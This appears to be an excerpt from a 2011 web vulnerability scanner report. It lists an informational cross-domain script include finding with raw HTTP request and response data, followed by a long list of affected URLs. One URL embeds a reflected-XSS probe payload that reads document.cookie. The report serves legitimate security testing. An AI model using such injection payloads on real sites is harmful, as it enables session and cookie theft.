Set-Cookie: ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 24730

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<HTML><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso
...[SNIP]...
</title>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

17.393. http://www.threatexpert.com/reports.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.threatexpert.com
Path:	/reports.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.threatexpert.com/reports.aspx?find=Trojan.Lineage.Gen

The response contains the following link to another domain:

http://www.google-analytics.com/urchin.js

Request

GET /reports.aspx?find=Trojan.Lineage.Gen HTTP/1.1
Host: www.threatexpert.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118387404.1296664190.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=118387404.1635200381.1296664190.1296664190.1296664190.1; __utmc=118387404; __utmb=118387404; ASP.NET_SessionId=e1exr355bmeecgqulqgwxiu0;

Response

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 04:05:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 17288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><title>
ThreatExp
...[SNIP]...
</script>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

18. Cross-domain script include previous next
There are 936 instances of this issue:

http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033
http://ad-emea.doubleclick.net/adi/N5506.150290.INVITEMEDIA/B5070033.24
http://ad.doubleclick.net/adi/N3285.google/B2343920.91
http://ad.doubleclick.net/adi/N3285.msn-dm/B2343920.67
http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3
http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3
http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.11
http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4
http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.5
http://ad.doubleclick.net/adi/N6036.149339.MICROSOFTONLINE/B5123903.5
http://ad.doubleclick.net/adi/dmd.ehow/computers
http://ad.doubleclick.net/adi/dmd.ehow/homepage
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/iframe3
http://ad.yieldmanager.com/iframe3
http://adadvisor.net/adscores/g.js
http://amihackerproof.com/
https://amihackerproof.com/about_us.php
http://autospies.com/
http://autospies.com/news/recent.aspx
http://bassistance.de/jquery-plugins/jquery-plugin-accordion/
http://blekko.com/
http://blekko.com/likes-info
http://blekko.com/tag/show
http://blekko.com/toolbar
http://blekko.com/ws/+/adsense=6316080006029695
http://blekko.com/ws/+/ip=82.165.200.22
http://blekko.com/ws/+/press-videos
http://blekko.com/ws/http:/2mdn.net/%20/domain
http://blekko.com/ws/xss
http://blekko.com/ws/xss+/cwe-79
http://blekko.com/ws/xss+cloudscan
http://blekko.com/ws/xss+cloudscan+/flickr
https://blekko.com/join
https://blekko.com/login
http://blog.facebook.com/blog.php
http://blog.facebook.com/blog.php
http://blog.pothoven.net/2007/12/aborting-ajax-requests-for-prototypejs.html
http://blog.robtex.com/
http://blog.threatexpert.com/
http://blog.twitter.com/
http://boardreader.com/
http://boardreader.com/a/2mdn.net/x22
http://boardreader.com/domain.php
http://boardreader.com/domain/2mdn.net/x22
http://boardreader.com/domain/aol.com
http://boardreader.com/domain/cafemom.com
http://boardreader.com/domain/myegy.com
http://boardreader.com/domain/nolanfans.com
http://boardreader.com/domain/ratedesi.com
http://boardreader.com/domain/sherdog.net
http://boardreader.com/domain/ufc.com
http://boardreader.com/domain/websitetoolbox.com
http://boardreader.com/domain/worldmastiffforum.com
http://boardreader.com/index.php
http://boardreader.com/info/about.htm
http://boardreader.com/info/agreement.htm
http://boardreader.com/info/contact.htm
http://boardreader.com/info/partners.htm
http://boardreader.com/info/plugins.htm
http://boardreader.com/info/policy.htm
http://boardreader.com/info/submit.htm
http://boardreader.com/last-searches.html
http://boardreader.com/linkinfo/2mdn.net
http://boardreader.com/my.html
http://boardreader.com/my/signup.html
http://boardreader.com/s/2mdn.html
http://boardreader.com/site/Monterey_military_Group_CafeMo_764716.html
http://boardreader.com/site/Nolan_Fans_Forums_8842059.html
http://boardreader.com/site/RateDesi_Forums_13026.html
http://boardreader.com/site/Research_Learn_Message_Boards_1404604.html
http://boardreader.com/site/Sherdog_Mixed_Martial_Arts_For_14952.html
http://boardreader.com/site/The_CafeMom_Newcomers_Club_Gro_655408.html
http://boardreader.com/site/The_Mastiff_Sweet_Spot_6024491.html
http://boardreader.com/site/UFC_Community_Forum_9057873.html
http://boardreader.com/site/Ultimate_College_Softball_5898982.html
http://boardreader.com/site/mntdiat_mai_aigi_7486781.html
http://boardreader.com/top-searches/now.html
http://boardreader.com/yourform.html
http://brandonaaron.net/
http://businessonmain.msn.com/browseresources/articles/firststeps.aspx
http://businessonmain.msn.com/browseresources/articles/managingemployees.aspx
http://businessonmain.msn.com/questions/default.aspx
http://businessonmain.msn.com/videos/coolrunnings.aspx
http://careers.orbitz.com/
http://cdn.cloudscan.us/cloudscandetails.aspx
http://cdn.cloudscan.us/learning.aspx
http://cherne.net/brian/resources/jquery.hoverIntent.html
http://code.google.com/p/swfobject/
http://code.google.com/p/swfobject/wiki/documentation
http://consumershealthyliving.com/clinical-study.html
http://cosmiclog.msnbc.msn.com/_news/2011/01/31/5962284-jerusalem-videos-stir-ufo-buzz
http://creativecommons.org/licenses/by-nd/2.5/br/deed.en_US
http://creativecommons.org/licenses/by-sa/3.0/
http://cruises.orbitz.com/
http://dating.msn.com/index.aspx
http://dating.msn.com/search/index.aspx
http://dean.edwards.name/weblog/2006/06/again/
http://dev.twitter.com/
http://developer.yahoo.com/yui/compressor/
http://developers.facebook.com/
http://developers.facebook.com/blog/
http://developers.facebook.com/blog/archive
http://developers.facebook.com/blog/post/377
http://developers.facebook.com/blog/post/377/
http://developers.facebook.com/devgarage
http://developers.facebook.com/docs/
http://developers.facebook.com/docs/changelog
http://developers.facebook.com/docs/opengraph
http://developers.facebook.com/live_status
http://developers.facebook.com/policy/
http://developers.facebook.com/roadmap
http://developers.facebook.com/search
http://developers.facebook.com/showcase/
http://digitalbush.com/projects/masked-input-plugin/
http://dillerdesign.com/experiment/DD_belatedPNG/
http://docs.jquery.com/UI
http://docs.jquery.com/UI/Datepicker
http://docs.jquery.com/UI/Effects/
http://ehough.com/
http://en.wikipedia.org/wiki/Cross-site_scripting
http://entertainment.msn.com/
http://entertainment.msn.com/news/
http://entertainment.msn.com/video/
https://faq.orbitz.com/
http://fitbie.msn.com/
http://fitbie.msn.com/lose-weight/tips/reasons-youre-destined-weight-loss-success
http://forums.plentyoffish.com/datingposts6866122.aspx
http://games.msn.com/
https://gc.synxis.com/rez.aspx
https://gc.synxis.com/xbe/rez.aspx
https://gc.synxis.com/xbe/rez.aspx
http://glo.msn.com/
http://glo.msn.com/living/celebrity-home-collections-6350.gallery
http://gocitykids.parentsconnect.com/data/service-calendar.json
http://googleads.g.doubleclick.net/pagead/ads
http://googleads.g.doubleclick.net/pagead/ads
http://googleonlinesecurity.blogspot.com/2009/03/reducing-xss-by-way-of-automatic.html
http://gsgd.co.uk/sandbox/jquery/easing/
http://health.msn.com/
http://health.msn.com/health-topics/quit-smoking/articlepage.aspx
http://hoyt.net/learning.aspx
http://ie6funeral.com/
http://inforavel.com/ad_type.php
http://insidemsn.wordpress.com/
http://investing.money.msn.com/investments/stock-price
http://it.toolbox.com/blogs/database-soup
http://it.toolbox.com/blogs/database-talk
http://it.toolbox.com/blogs/db2luw
http://it.toolbox.com/blogs/db2zos
http://it.toolbox.com/blogs/elsua
http://it.toolbox.com/blogs/juice-analytics
http://it.toolbox.com/blogs/minimalit
http://it.toolbox.com/blogs/penguinista-databasiensis
http://it.toolbox.com/blogs/ppmtoday
http://javascript.nwbox.com/IEContentLoaded/
http://johannburkard.de/blog/programming/javascript/highlight-javascript-text-higlighting-jquery-plugin.html
http://jquery.com/
http://jquery.malsup.com/cycle/
http://jquery.org/license
http://jqueryui.com/about
http://juicystudio.com/article/improving-ajax-applications-for-jaws-users.php
http://leads.demandbase.com/
http://leandrovieira.com/projects/jquery/lightbox/
http://lifestyle.msn.com/
http://lifestyle.msn.com/relationships/
http://lifestyle.msn.com/relationships/staticslideshowglamour.aspx
http://lifestyle.msn.com/relationships/your-money-today/article.aspx
http://lifestyle.msn.com/your-home/cleaning-organizing/staticslideshowrs.aspx
http://lifestyle.msn.com/your-life/family-fun/staticslideshowrs.aspx
http://lifestyle.msn.com/your-life/new-year-new-you/article.aspx
http://lifestyle.msn.com/your-look/
http://lifestyle.msn.com/your-look/celebrity-style/staticslideshowmc.aspx
http://lifestyle.msn.com/your-look/everyday-style/staticslideshowglamour.aspx
http://lifestyle.msn.com/your-look/everyday-style/staticslideshowlucky.aspx
http://lifestyle.msn.com/your-look/well-groomed-male/staticslideshowgq.aspx
http://login.live.com/login.srf
http://mad4milk.net/
http://malsup.com/jquery/cycle/
http://medienfreunde.com/lab/innerfade/
http://mir.aculo.us/
http://mofones.com/
http://montanaplates.com/
http://montanaplates.com/209194-Twitter-Tweets-about-Montana-LLC-as-of-January-31-2011.html
http://montanaplates.com/287485-Are-you-Scaring-away-Potential-Customers.html
http://montanaplates.com/315548-Twitter-Tweets-about-Llc-as-of-January-29-2011.html
http://montanaplates.com/354683-Twitter-Tweets-about-Montana-LLC-as-of-January-28-2011.html
http://montanaplates.com/490605-Is-your-Credit-Policy-Working.html
http://montanaplates.com/530262-How-Important-is-a-Credit-Policy.html
http://montanaplates.com/586605-Twitter-Tweets-about-Montana-LLC-as-of-January-19-2011.html
http://montanaplates.com/803874-Twitter-Tweets-about-Llc-as-of-January-27-2011.html
http://montanaplates.com/826400-Trusting-Your-Gut.html
http://montanaplates.com/880540-Twitter-Tweets-about-Llc-as-of-January-20-2011.html
http://montanaplates.com/archive-2010-02.html
http://montanaplates.com/archive-2010-05.html
http://montanaplates.com/archive-2010-06.html
http://montanaplates.com/archive-2010-07.html
http://montanaplates.com/archive-2010-08.html
http://montanaplates.com/archive-2010-09.html
http://montanaplates.com/archive-2010-10.html
http://montanaplates.com/archive-2010-11.html
http://montanaplates.com/archive-2010-12.html
http://montanaplates.com/archive-2011-01.html
http://mootools.net/
http://mootools.net/developers
http://movies.msn.com/
http://movies.msn.com/movies/article.aspx
http://movies.msn.com/new-on-dvd/movies/
http://movies.msn.com/paralleluniverse/5-demonic-possession-movies/story/across-the-universe/
http://movies.msn.com/paralleluniverse/henry-cavill-is-superman/story/across-the-universe/
http://movies.msn.com/paralleluniverse/in-praise-of-buried/story/across-the-universe/
http://movies.msn.com/paralleluniverse/new-sci-fi-from-alien-ashes/story/across-the-universe/
http://movies.msn.com/the-rundown/the-guard/story_5/
http://music.msn.com/
http://music.msn.com/music/article.aspx
https://my.omniture.com/login/
https://my.omniture.com/p/suite/1.2/index.html
http://nationalcybersecurity.com/
http://outsideonline.com/
http://picasaweb.google.com/lh/view
https://picasaweb.google.com/lh/view
http://pressroom.orbitz.com/
https://publish.omniture.com/center/
https://publish.omniture.com/center/util/
http://realestate.msn.com/
http://realestate.msn.com/slideshow.aspx
http://script.aculo.us/
https://secure.avangate.com/order/checkout.php
https://secure.avangate.com/order/nojs.php
https://sitesearch.omniture.com/center/
https://sitesearch.omniture.com/center/util/
http://spoofem.com/
http://stackoverflow.com/questions/1890512/handling-errors-in-jquerydocument-ready
http://technolog.msnbc.msn.com/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar
http://technolog.msnbc.msn.com/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar
http://technolog.msnbc.msn.com/_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing
http://technolog.msnbc.msn.com/_news/2011/01/31/5962042-quadriplegic-man-sets-record-for-fastest-hands-free-typing
http://thebubble.msn.com/
http://today.msnbc.msn.com/
http://today.msnbc.msn.com/id/41299602/ns/today-today_fashion_and_beauty/
http://today.msnbc.msn.com/id/41302280/ns/today-entertainment/
http://trw.com/who_we_are/locations
http://trw.mediaroom.com/index.php
http://tubepress.org/
http://tv.msn.com/
http://tv.msn.com/last-night-on-tv/
http://tv.msn.com/tv/article.aspx
http://twitter.com/
http://twitter.com/
http://twitter.com/BWBLLC
http://twitter.com/BWBLLC
http://twitter.com/BW_Technology
http://twitter.com/BW_Technology
http://twitter.com/Chester_Pitts
http://twitter.com/Cirque
http://twitter.com/JetBlue
http://twitter.com/JohnsHopkinsSPH
http://twitter.com/McKQuarterly
http://twitter.com/MomsWhoSave
http://twitter.com/NetworkConnects
http://twitter.com/NetworkConnects
http://twitter.com/Nightline
http://twitter.com/NoReservations
http://twitter.com/NylonMag
http://twitter.com/OmnitureEMEA
http://twitter.com/PeaceCorps
http://twitter.com/Support
http://twitter.com/TakeoSpikes51
http://twitter.com/TomorrowCounsel
http://twitter.com/TomorrowCounsel
http://twitter.com/VirginiaBeachWk
http://twitter.com/VirginiaBeachWk
http://twitter.com/Wyome655
http://twitter.com/Wyome655
http://twitter.com/about
http://twitter.com/about/contact
http://twitter.com/about/resources
http://twitter.com/account/complete
http://twitter.com/account/resend_password
http://twitter.com/arnui
http://twitter.com/arnui
http://twitter.com/ashleytisdale
http://twitter.com/best_golf
http://twitter.com/best_golf
http://twitter.com/buyantsogtoo
http://twitter.com/buyantsogtoo
http://twitter.com/chain_llc
http://twitter.com/chain_llc
http://twitter.com/chain_llc_cod
http://twitter.com/chain_llc_cod
http://twitter.com/chain_llc_mg
http://twitter.com/chain_llc_mg
http://twitter.com/cloudscan
http://twitter.com/cloudscan
http://twitter.com/coolmompicks
http://twitter.com/davidgregory
http://twitter.com/designmilk
http://twitter.com/donlomb
http://twitter.com/donlomb
http://twitter.com/gamespot
http://twitter.com/jasmith579
http://twitter.com/jasmith579
http://twitter.com/jobs4writers
http://twitter.com/jobs4writers
http://twitter.com/ligatt
http://twitter.com/lijobs_sales
http://twitter.com/lijobs_sales
http://twitter.com/login
http://twitter.com/millenniumpr
http://twitter.com/newtwitter
http://twitter.com/omniture
http://twitter.com/omniturecare
http://twitter.com/orbitz
http://twitter.com/orbitz
http://twitter.com/privacy
http://twitter.com/prolawrssfeed
http://twitter.com/prolawrssfeed
http://twitter.com/qianam
http://twitter.com/qianam
http://twitter.com/rosyresources
http://twitter.com/rosyresources
http://twitter.com/sarahdessen
http://twitter.com/science
http://twitter.com/search
http://twitter.com/search
http://twitter.com/search
http://twitter.com/search
http://twitter.com/sethmeyers21
http://twitter.com/sp_arizona
http://twitter.com/sp_arizona
http://twitter.com/sp_oregon
http://twitter.com/sp_oregon
http://twitter.com/sp_tx
http://twitter.com/sp_tx
http://twitter.com/toptweets/favorites
http://twitter.com/tos
https://twitter.com/
https://twitter.com/about
https://twitter.com/about/contact
https://twitter.com/about/resources
https://twitter.com/account/complete
https://twitter.com/account/resend_password
https://twitter.com/login
https://twitter.com/privacy
https://twitter.com/sessions
https://twitter.com/sessions
https://twitter.com/signup
https://twitter.com/tos
http://updates.orbitz.com/
http://updates.orbitz.com/favicon.ico
http://updates.orbitz.com/flight_status
http://updates.orbitz.com/pos/ocom/coBrand/msn/orbitzmsn.css
http://vimeo.com/
http://webcache.googleusercontent.com/search
http://webreflection.blogspot.com/2009/01/32-bytes-to-know-if-your-browser-is-ie.html
http://wonderwall.msn.com/
http://wonderwall.msn.com/movies/best-actor-nominees-2011-11135.gallery
http://wonderwall.msn.com/movies/gwyneth-paltrow-wanted-to-scrap-goop-to-halt-criticism-1594220.story
http://wonderwall.msn.com/movies/halle-berry-set-to-battle-model-ex-over-custody-1594335.story
http://wonderwall.msn.com/movies/kelly-mcgillis-hid-sexuality-for-kids-sake-1594256.story
http://wonderwall.msn.com/movies/nicole-kidman-raising-baby-faith-margaret-is-beyond-thrilling-1594332.story
http://wordpress.org/
http://www.addthis.com/bookmark.php
http://www.amihackerproof.com/
http://www.answerbag.com/
http://www.astaro.com/
http://www.astaro.com/advanced
http://www.astaro.com/buy-astaro
http://www.astaro.com/callback
http://www.astaro.com/company/advanced
http://www.astaro.com/company/astaro-management-team
http://www.astaro.com/company/astaro-supervisory-board
http://www.astaro.com/company/career
http://www.astaro.com/company/company-profile
http://www.astaro.com/company/contact-astaro
http://www.astaro.com/company/javascript:void()
http://www.astaro.com/company/sponsorship
http://www.astaro.com/company/worldwide-offices
http://www.astaro.com/gateway/builder/settings
http://www.astaro.com/javascript:void()
http://www.astaro.com/legal-statement
http://www.astaro.com/newsletter
http://www.astaro.com/products
http://www.astaro.com/products/access-points
http://www.astaro.com/products/astaro-clients
http://www.astaro.com/products/astaro-command-center
http://www.astaro.com/products/astaro-red
http://www.astaro.com/products/astaro-security-gateway-software-appliance
http://www.astaro.com/products/astaro-security-gateway-virtual-appliance-for-vmware
http://www.astaro.com/products/astaro-smart-installer
http://www.astaro.com/products/hardware-appliances
https://www.astaro.com/en
http://www.autocheck.com/
http://www.bing.com/travel/
http://www.bing.com/travel/content/search
http://www.bing.com/videos/browse
http://www.bing.com/videos/watch/video/earthquake-proof-bridge/pfu8x7j
http://www.bing.com/videos/watch/video/ice-cube-talks-tv-film-and-music/6vztnpj
http://www.bing.com/videos/watch/video/jay-mohr-part-1/17wj9ueo7
http://www.bing.com/videos/watch/video/rio-exclusive-films-first-two-minutes/5eq4owv
http://www.bing.com/videos/watch/video/the-roommate-exclusive-clip-just-doing-my-job/5tbba1k
http://www.bundle.com/
http://www.cafemom.com/group/416
http://www.cheaptickets.com/
http://www.cloudscan.me/
http://www.cloudscan.me/2010/09/vendor-ip-board-software-version-312.html
http://www.cloudscan.me/2010/12/doubleclicknet-ad-cdn-http-header.html
http://www.datingfreesite.net/
http://www.delish.com/
http://www.delish.com/entertaining-ideas/party-ideas/valentines-day-romantic-recipes-tips
http://www.demandstudios.com/ehow-writers.html
http://www.digitalia.be/
http://www.dillerdesign.com/experiment/DD_belatedPNG/
http://www.directstartv.com/
http://www.dustindiaz.com/
http://www.ebookers.com/
http://www.ehow.co.uk/
http://www.ehow.com/
http://www.ehow.com/MailingList.html
http://www.ehow.com/about_us/about_us.aspx
http://www.ehow.com/about_us/contact_us.aspx
http://www.ehow.com/about_us/faq_ehow.aspx
http://www.ehow.com/about_us/link_to_us.aspx
http://www.ehow.com/account/simple_login.aspx
http://www.ehow.com/account/simple_register.aspx
http://www.ehow.com/ajax/
http://www.ehow.com/arts-and-crafts/
http://www.ehow.com/arts-and-entertainment/
http://www.ehow.com/beauty-and-personal-care/
http://www.ehow.com/blog/
http://www.ehow.com/business/
http://www.ehow.com/car-repair-and-maintenance/
http://www.ehow.com/careers/
http://www.ehow.com/cars/
http://www.ehow.com/community.html
http://www.ehow.com/computer-software/
http://www.ehow.com/computers/
http://www.ehow.com/culture-and-society/
http://www.ehow.com/diseases-and-conditions/
http://www.ehow.com/drugs-and-supplements/
http://www.ehow.com/education/
http://www.ehow.com/ehow-family/
http://www.ehow.com/ehow-food/
http://www.ehow.com/ehow-health/
http://www.ehow.com/ehow-home/
http://www.ehow.com/ehow-mobile.aspx
http://www.ehow.com/ehow-money/
http://www.ehow.com/ehow-style/
http://www.ehow.com/ehow-tax-time/
http://www.ehow.com/electronics/
http://www.ehow.com/family-health/
http://www.ehow.com/fashion-and-style/
http://www.ehow.com/fitness/
http://www.ehow.com/flu-season/
http://www.ehow.com/food-and-drink/
http://www.ehow.com/groups.aspx
http://www.ehow.com/healthcare/
http://www.ehow.com/healthy-living/
http://www.ehow.com/hobbies-and-science/
http://www.ehow.com/holidays-and-celebrations/
http://www.ehow.com/home-building-and-remodeling/
http://www.ehow.com/home-design-and-decorating/
http://www.ehow.com/home-maintenance-and-repair/
http://www.ehow.com/home-safety-and-household-tips/
http://www.ehow.com/home-security-alarm/
http://www.ehow.com/housekeeping/
http://www.ehow.com/how-to.html
http://www.ehow.com/how_13299_know-someone-lying.html
http://www.ehow.com/how_2053743_make-crock-pot-pork-roast.html
http://www.ehow.com/how_2077554_repair-cracks-dashboard.html
http://www.ehow.com/how_2113353_end-sibling-feuds.html
http://www.ehow.com/how_2304056_cut-shirt-make-cuter.html
http://www.ehow.com/how_3815_minutes-business-meeting.html
http://www.ehow.com/how_4469163_edit-pdf-document.html
http://www.ehow.com/how_4474239_make-graph-using-excel.html
http://www.ehow.com/how_4924781_open-pub-file-mac.html
http://www.ehow.com/how_5073161_convert-wps-file-extension.html
http://www.ehow.com/how_5215115_change-startup-programs-windows-7.html
http://www.ehow.com/how_5381925_make-roof-rake.html
http://www.ehow.com/how_5521182_avoid-seasonal-affective-disorder-sad.html
http://www.ehow.com/how_5809012_create-indoor-gardens.html
http://www.ehow.com/how_6469141_improve-english-grammar-skills.html
http://www.ehow.com/how_7496527_resolve-5-common-grammar-problems.html
http://www.ehow.com/how_7744253_attach-mini-shades-update-chandelier.html
http://www.ehow.com/how_7856914_prevent-chimney-fires.html
http://www.ehow.com/how_9191_program-rca-universal.html
http://www.ehow.com/internet/
http://www.ehow.com/job-search-and-employment/
http://www.ehow.com/lawn-and-garden/
http://www.ehow.com/legal/
http://www.ehow.com/list_6515049_common-english-grammar-mistakes.html
http://www.ehow.com/list_7189463_grammar-check-tools.html
http://www.ehow.com/lose-weight/
http://www.ehow.com/members.html
http://www.ehow.com/mental-health/
http://www.ehow.com/music/
http://www.ehow.com/parenting/
http://www.ehow.com/personal-finance/
http://www.ehow.com/pets-and-animals/
http://www.ehow.com/photos/
http://www.ehow.com/plant-care/
http://www.ehow.com/plants/
http://www.ehow.com/privacy.aspx
http://www.ehow.com/real-estate-and-investment/
http://www.ehow.com/recipes/
http://www.ehow.com/recreational-activities/
http://www.ehow.com/relationships-and-family/
http://www.ehow.com/search.aspx
http://www.ehow.com/share.html
http://www.ehow.com/site-map.html
http://www.ehow.com/sitemap.html
http://www.ehow.com/sports/
http://www.ehow.com/terms_use.aspx
http://www.ehow.com/topic_227_take-pictures.html
http://www.ehow.com/topic_2488_lose-weight.html
http://www.ehow.com/topic_253_lose-weight-now.html
http://www.ehow.com/topic_3493_lose-weight-dieting.html
http://www.ehow.com/topic_363_winter-sports.html
http://www.ehow.com/topic_3818_flu-guide.html
http://www.ehow.com/topic_3990_home-security-systems-guide.html
http://www.ehow.com/topic_401_home-alarms.html
http://www.ehow.com/topic_4028_preparing-flu-season.html
http://www.ehow.com/topic_4127_home-alarm-system-guide.html
http://www.ehow.com/topic_429_all-flu.html
http://www.ehow.com/topic_4989_photo-sharing-101.html
http://www.ehow.com/topic_49_treating-colds-flus.html
http://www.ehow.com/topic_5023_jog-lose-weight.html
http://www.ehow.com/topic_689_black-white-photos.html
http://www.ehow.com/topic_745_capture-enduring-wedding-photos.html
http://www.ehow.com/topic_7853_floor-fountains-guide.html
http://www.ehow.com/topic_7992_floor-water-fountains-101.html
http://www.ehow.com/topic_8016_outdoor-garden-fountains-guide.html
http://www.ehow.com/topic_8047_water-garden-fountains-101.html
http://www.ehow.com/toys-and-games/
http://www.ehow.com/unavailable.aspx
http://www.ehow.com/us-travel/
http://www.ehow.com/vacations-and-travel-planning/
http://www.ehow.com/video_6598099_make-sugar-spice-scrub.html
http://www.ehow.com/video_6976779_sensational-snacks.html
http://www.ehow.com/video_7199214_onion-flatbread-recipe.html
http://www.ehow.com/videos.html
http://www.ehow.com/weddings-and-parties/
http://www.ehow.com/weight-management-and-body-image/
http://www.ehow.com/winterize-a-garden/
http://www.ehow.com/xd_receiver.htm
https://www.ehow.com/account/simple_login.aspx
https://www.ehow.com/account/simple_register.aspx
https://www.ehow.com/content/compressed/en-US/common-kvgh0g.css
https://www.ehow.com/content/compressed/en-US/common-mXhI4A.css
https://www.ehow.com/forms/
https://www.ehow.com/forms/PasswordRetrieval.aspx
https://www.ehow.com/forms/signin.aspx
https://www.ehow.com/js/gasp.js
https://www.ehow.com/js/i2a.js
https://www.ehow.com/privacy.aspx
https://www.ehow.com/terms_use.aspx
https://www.ehow.com/xd_receiver.htm
http://www.elib.org/articles/
http://www.elib.org/articles/category/wordpress/
http://www.everydaylifestyles.com/articles3.php
http://www.evow.com/
http://www.exploit-db.com/exploits/15313/
http://www.f-secure.com/weblog/archives/00001972.html
http://www.facebook.com/
http://www.facebook.com/
http://www.facebook.com/%s
http://www.facebook.com/2008/fbml
http://www.facebook.com/MillenniumHotels
http://www.facebook.com/ajax/intl/language_dialog.php
http://www.facebook.com/btaylor
http://www.facebook.com/careers/
http://www.facebook.com/directory/pages/
http://www.facebook.com/directory/people/
http://www.facebook.com/facebook
http://www.facebook.com/help/
http://www.facebook.com/ligatt
http://www.facebook.com/platform
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/activity.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/facepile.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/policy.php
http://www.facebook.com/privacy/explanation.php
http://www.facebook.com/r.php
http://www.facebook.com/r.php
http://www.facebook.com/terms.php
http://www.google.com/accounts/TOS
http://www.google.com/ig/adde
http://www.google.com/intl/en/options/
http://www.google.com/support/chrome/bin/answer.py
http://www.google.com/support/websearch/bin/answer.py
http://www.google.com/uds/solutions/localsearch/gmlocalsearch.js
http://www.gorp.com/
http://www.hotels.com/ho113791/millennium-bostonian-hotel-boston-boston-united-states/
http://www.huddletogether.com/projects/lightbox2/
http://www.huffingtonpost.com/2008/11/16/paul-mccartney-hopes-to-r_n_144138.html
http://www.invisionpower.com/index.php
http://www.iphoneez.com/
http://www.ispad.info/
http://www.kampyle.com/
http://www.ligattsecurity.com/
http://www.ligattsecurity.com/:nolink
http://www.ligattsecurity.com/about-us
http://www.ligattsecurity.com/commercials
http://www.ligattsecurity.com/font.swf
http://www.ligattsecurity.com/ligatt-security/wp-admin
http://www.ligattsecurity.com/solutions
http://www.ligattsecurity.com/solutions/am-i-hacker-proof
http://www.ligattsecurity.com/solutions/boobytrap
http://www.ligattsecurity.com/solutions/hacker-in-15-minutes
http://www.ligattsecurity.com/wp-content/themes/elite-force/favicon.ico
http://www.livestrong.com/
http://www.loansendorsed.com/
http://www.lodging.com/
http://www.mensfitness.com/Tshirt_Workout/fitness/ab_exercises/136
http://www.mensfitness.com/Tshirt_Workout9f9d9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3E35c645f95fa/fitness/ab_exercises/a
http://www.mensfitness.com/sports_and_recreation/outdoor_recreation/55
http://www.millenniumhotels.co.nz/copthorneaucklandcity/index.html
http://www.millenniumhotels.co.nz/copthornebayofislands/index.html
http://www.millenniumhotels.co.nz/copthornechristchurchairport/index.html
http://www.millenniumhotels.co.nz/copthornechristchurchcentral/index.html
http://www.millenniumhotels.co.nz/copthornechristchurchcity/index.html
http://www.millenniumhotels.co.nz/copthornedurhamstreet/index.html
http://www.millenniumhotels.co.nz/copthorneharbourcity/index.html
http://www.millenniumhotels.co.nz/copthornehokianga/index.html
http://www.millenniumhotels.co.nz/copthornemarlborough/index.html
http://www.millenniumhotels.co.nz/copthornenewplymouth/index.html
http://www.millenniumhotels.co.nz/copthorneorientalbay/index.html
http://www.millenniumhotels.co.nz/copthornequeenstownlakefront/index.html
http://www.millenniumhotels.co.nz/copthornewairarapa/index.html
http://www.millenniumhotels.co.nz/index.html
http://www.millenniumhotels.co.nz/kingsgateauckland/index.html
http://www.millenniumhotels.co.nz/kingsgatedunedin/index.html
http://www.millenniumhotels.co.nz/kingsgategreymouth/index.html
http://www.millenniumhotels.co.nz/kingsgatehamilton/index.html
http://www.millenniumhotels.co.nz/kingsgateoamaru/index.html
http://www.millenniumhotels.co.nz/kingsgatepaihia/index.html
http://www.millenniumhotels.co.nz/kingsgatepalmerstonnorth/index.html
http://www.millenniumhotels.co.nz/kingsgatequeenstown/index.html
http://www.millenniumhotels.co.nz/kingsgaterotorua/index.html
http://www.millenniumhotels.co.nz/kingsgateteanau/index.html
http://www.millenniumhotels.co.nz/kingsgatewanganui/index.html
http://www.millenniumhotels.co.nz/kingsgatewellington/index.html
http://www.millenniumhotels.co.nz/kingsgatewhangarei/index.html
http://www.millenniumhotels.co.nz/millenniumchristchurch/index.html
http://www.millenniumhotels.co.nz/millenniumqueenstown/index.html
http://www.millenniumhotels.co.nz/millenniumrotorua/index.html
http://www.millenniumhotels.co.nz/millenniumtaupo/index.html
http://www.millenniumhotels.co.uk/copthorneaberdeen/index.html
http://www.millenniumhotels.co.uk/copthornebirmingham/index.html
http://www.millenniumhotels.co.uk/copthornecardiff/index.html
http://www.millenniumhotels.co.uk/copthornedudley/index.html
http://www.millenniumhotels.co.uk/copthorneeffinghamgatwick/index.html
http://www.millenniumhotels.co.uk/copthornegatwick/index.html
http://www.millenniumhotels.co.uk/copthornemanchester/index.html
http://www.millenniumhotels.co.uk/copthornenewcastle/index.html
